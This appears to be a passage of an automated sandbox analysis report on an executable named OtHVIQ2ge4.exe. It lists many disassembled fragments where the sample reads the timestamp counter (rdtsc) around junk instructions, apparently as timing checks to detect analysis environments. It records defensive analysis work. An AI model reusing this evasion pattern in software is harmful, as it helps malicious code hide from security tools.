Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F3C85 second address: 7F3C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F3C8D second address: 7F3C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F3C92 second address: 7F3C97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F3C97 second address: 7F3CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FF628D73F62h 0x0000000b jmp 00007FF628D73F5Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FF628D73F65h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FF628D73F60h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F3CDA second address: 7F3CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 jbe 00007FF628B69586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA328 second address: 7FA33A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF628D73F56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA472 second address: 7FA476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA476 second address: 7FA47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA47A second address: 7FA482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA482 second address: 7FA488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7FA488 second address: 7FA48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8051BD second address: 8051C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8051C1 second address: 8051C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8051C5 second address: 8051E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF628D73F67h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 808FC6 second address: 808FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80CFA7 second address: 80CFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F63h 0x00000009 pop ebx 0x0000000a jmp 00007FF628D73F5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80CFCD second address: 80CFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80F254 second address: 80F25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80F25A second address: 80F266 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80F266 second address: 80F26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 80F26C second address: 80F272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 81547A second address: 81547E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 81547E second address: 81548E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B6958Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 73D67D second address: 73D681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 81E874 second address: 81E87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 827CBE second address: 827CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 827CCB second address: 827CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 82697C second address: 82698F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Dh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 826C9D second address: 826CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 826CA3 second address: 826CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8292D9 second address: 8292FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF628B69586h 0x00000008 jnp 00007FF628B69586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF628B69591h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8292FD second address: 82931D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FF628D73F64h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 82CEBC second address: 82CEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF628B69586h 0x0000000a jno 00007FF628B69586h 0x00000010 popad 0x00000011 push ecx 0x00000012 jmp 00007FF628B69593h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 82CEE3 second address: 82CEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF628D73F56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 82CEF2 second address: 82CF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007FF628B69586h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 82CF00 second address: 82CF0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF628D73F56h 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 836429 second address: 836449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FF628B6958Eh 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 836449 second address: 836451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 83973F second address: 839743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 839743 second address: 839747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 84B4BD second address: 84B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 84B1FA second address: 84B20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 js 00007FF628D73F62h 0x0000000d jno 00007FF628D73F56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861F79 second address: 861F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 860D67 second address: 860D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F64h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF628D73F62h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 860D93 second address: 860D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 860D99 second address: 860DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF628D73F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 860F16 second address: 860F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B69598h 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FF628B69586h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861092 second address: 861098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861098 second address: 86109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 86123D second address: 861241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861241 second address: 861246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861246 second address: 861258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F5Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861669 second address: 86167F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF628B6958Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 86167F second address: 8616BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF628D73F5Bh 0x00000010 ja 00007FF628D73F6Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861C2E second address: 861C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 861C3C second address: 861C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F68h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8660D5 second address: 8660DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8664C3 second address: 866519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007FF628D73F56h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FF628D73F67h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF628D73F62h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 866519 second address: 866523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF628B69586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 8679E2 second address: 8679F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF628D73F5Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 869950 second address: 86998C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF628B69599h 0x0000000b jmp 00007FF628B6958Bh 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FF628B6958Bh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 86998C second address: 869999 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 869999 second address: 8699BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF628B69586h 0x00000010 jmp 00007FF628B69592h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 781DA4 second address: 781DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 781DA8 second address: 781DC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF628B69599h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 781DC9 second address: 781DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007FF628D73F5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 547025F second address: 5470263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5470263 second address: 5470267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5470267 second address: 54702A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF628B6958Dh 0x0000000c add esi, 5E3BF9E6h 0x00000012 jmp 00007FF628B69591h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF628B6958Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54702A6 second address: 54702B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54702C9 second address: 54702E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54905F4 second address: 5490668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007FF628D73F65h 0x0000000f add si, 8FB6h 0x00000014 jmp 00007FF628D73F61h 0x00000019 popfd 0x0000001a pop eax 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, al 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FF628D73F62h 0x00000027 xor esi, 04F34208h 0x0000002d jmp 00007FF628D73F5Bh 0x00000032 popfd 0x00000033 pop esi 0x00000034 popad 0x00000035 mov dword ptr [esp], ebp 0x00000038 pushad 0x00000039 movsx edi, cx 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490668 second address: 549066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 549066E second address: 5490690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490690 second address: 5490694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490694 second address: 5490698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490698 second address: 549069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 549069E second address: 54906BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF628D73F5Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54906BD second address: 54906C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54906C3 second address: 5490701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF628D73F5Fh 0x00000010 and ax, 926Eh 0x00000015 jmp 00007FF628D73F69h 0x0000001a popfd 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490701 second address: 5490782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007FF628B69598h 0x0000000c push eax 0x0000000d pushad 0x0000000e mov ebx, 434296C4h 0x00000013 mov esi, edx 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF628B69591h 0x0000001e and eax, 4EEA5AB6h 0x00000024 jmp 00007FF628B69591h 0x00000029 popfd 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-04h] 0x0000002e jmp 00007FF628B6958Eh 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF628B69597h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490782 second address: 5490796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 65B65038h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, ax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490796 second address: 54907D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, dx 0x0000000c popad 0x0000000d nop 0x0000000e jmp 00007FF628B6958Dh 0x00000013 push dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF628B6958Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54907F4 second address: 5490854 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 7Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF628D73F5Bh 0x0000000c and ecx, 36533D6Eh 0x00000012 jmp 00007FF628D73F69h 0x00000017 popfd 0x00000018 popad 0x00000019 cmp dword ptr [ebp-04h], 00000000h 0x0000001d jmp 00007FF628D73F5Eh 0x00000022 mov esi, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF628D73F67h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490854 second address: 5490886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 37F3793Ah 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FF628B69606h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FF628B69596h 0x0000001b pop eax 0x0000001c mov di, 6866h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490902 second address: 5490908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490908 second address: 549090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
